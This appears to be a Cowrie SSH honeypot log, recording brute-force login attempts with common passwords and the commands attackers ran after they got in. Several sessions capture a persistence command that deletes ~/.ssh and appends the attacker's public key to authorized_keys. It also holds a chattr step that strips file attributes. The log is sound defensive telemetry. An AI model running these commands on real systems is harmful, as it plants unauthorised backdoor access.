{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:49:53.127906Z","src_ip":"212.227.235.229","session":"4ed18fd1bc95"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:49:53.524166Z","src_ip":"212.227.235.229","session":"4ed18fd1bc95"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":33280,"dst_ip":"1.2.3.4","dst_port":22,"session":"3598129edb44","protocol":"ssh","message":"New connection: 45.88.8.186:33280 (1.2.3.4:22) [session: 3598129edb44]","sensor":"my-vps","timestamp":"2025-08-26T18:51:32.626376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:51:33.080865Z","src_ip":"45.88.8.186","session":"3598129edb44"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:51:33.081577Z","src_ip":"45.88.8.186","session":"3598129edb44"}
{"eventid":"cowrie.login.success","username":"root","password":"000005","message":"login attempt [root/000005] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:51:35.230445Z","src_ip":"45.88.8.186","session":"3598129edb44"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:51:35.795783Z","src_ip":"45.88.8.186","session":"3598129edb44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51322,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d5d74314d9a","protocol":"ssh","message":"New connection: 212.227.235.229:51322 (1.2.3.4:22) [session: 1d5d74314d9a]","sensor":"my-vps","timestamp":"2025-08-26T18:51:51.357381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:51:51.358040Z","src_ip":"212.227.235.229","session":"1d5d74314d9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:51:51.592369Z","src_ip":"212.227.235.229","session":"1d5d74314d9a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"changeme","message":"login attempt [ubuntu/changeme] failed","sensor":"my-vps","timestamp":"2025-08-26T18:51:52.570967Z","src_ip":"212.227.235.229","session":"1d5d74314d9a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:51:53.807727Z","src_ip":"212.227.235.229","session":"1d5d74314d9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49647,"dst_ip":"1.2.3.4","dst_port":22,"session":"57208e045413","protocol":"ssh","message":"New connection: 212.227.235.229:49647 (1.2.3.4:22) [session: 57208e045413]","sensor":"my-vps","timestamp":"2025-08-26T18:51:55.872477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:51:55.873617Z","src_ip":"212.227.235.229","session":"57208e045413"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:51:56.127407Z","src_ip":"212.227.235.229","session":"57208e045413"}
{"eventid":"cowrie.login.failed","username":"george","password":"123456","message":"login attempt [george/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T18:51:57.153848Z","src_ip":"212.227.235.229","session":"57208e045413"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:51:58.403374Z","src_ip":"212.227.235.229","session":"57208e045413"}
{"eventid":"cowrie.session.connect","src_ip":"118.193.56.141","src_port":53550,"dst_ip":"1.2.3.4","dst_port":22,"session":"df97b7f26f66","protocol":"ssh","message":"New connection: 118.193.56.141:53550 (1.2.3.4:22) [session: df97b7f26f66]","sensor":"my-vps","timestamp":"2025-08-26T18:52:10.865830Z"}
{"eventid":"cowrie.client.version","version":"\u0000\u0000\u0004T","message":"Remote SSH version: \u0000\u0000\u0004T","sensor":"my-vps","timestamp":"2025-08-26T18:52:10.881142Z","src_ip":"118.193.56.141","session":"df97b7f26f66"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:10.882167Z","src_ip":"118.193.56.141","session":"df97b7f26f66"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49218,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b38ec48d227","protocol":"ssh","message":"New connection: 217.72.205.35:49218 (1.2.3.4:22) [session: 8b38ec48d227]","sensor":"my-vps","timestamp":"2025-08-26T18:52:22.625970Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:22.627910Z","src_ip":"217.72.205.35","session":"8b38ec48d227"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58226,"dst_ip":"1.2.3.4","dst_port":22,"session":"c61fb0993e95","protocol":"ssh","message":"New connection: 212.227.235.229:58226 (1.2.3.4:22) [session: c61fb0993e95]","sensor":"my-vps","timestamp":"2025-08-26T18:52:24.340575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:52:24.341546Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:52:24.649753Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.login.success","username":"root","password":"admin456","message":"login attempt [root/admin456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:52:25.924479Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:52:26.608615Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:52:26.609288Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:52:26.610385Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:26.920119Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:52:27.564531Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:52:27.565192Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:52:27.876031Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:27.877108Z","src_ip":"212.227.235.229","session":"c61fb0993e95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37506,"dst_ip":"1.2.3.4","dst_port":22,"session":"49f5f8d666b7","protocol":"ssh","message":"New connection: 212.227.235.229:37506 (1.2.3.4:22) [session: 49f5f8d666b7]","sensor":"my-vps","timestamp":"2025-08-26T18:52:28.170082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:52:28.171122Z","src_ip":"212.227.235.229","session":"49f5f8d666b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:52:28.465499Z","src_ip":"212.227.235.229","session":"49f5f8d666b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33470,"dst_ip":"1.2.3.4","dst_port":22,"session":"25f3acfc3d2f","protocol":"ssh","message":"New connection: 212.227.235.229:33470 (1.2.3.4:22) [session: 25f3acfc3d2f]","sensor":"my-vps","timestamp":"2025-08-26T18:52:28.956912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:52:28.957478Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:52:29.202959Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:52:29.684314Z","src_ip":"212.227.235.229","session":"49f5f8d666b7"}
{"eventid":"cowrie.login.success","username":"root","password":"123.a","message":"login attempt [root/123.a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:52:30.227283Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:52:30.774263Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:52:30.774754Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:52:30.776185Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:30.980134Z","src_ip":"212.227.235.229","session":"49f5f8d666b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:52:31.023116Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37522,"dst_ip":"1.2.3.4","dst_port":22,"session":"c32996c641d4","protocol":"ssh","message":"New connection: 212.227.235.229:37522 (1.2.3.4:22) [session: c32996c641d4]","sensor":"my-vps","timestamp":"2025-08-26T18:52:31.272809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:52:31.274045Z","src_ip":"212.227.235.229","session":"c32996c641d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:52:31.530743Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:52:31.531447Z","src_ip":"212.227.235.229","session":"25f3acfc3d2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-c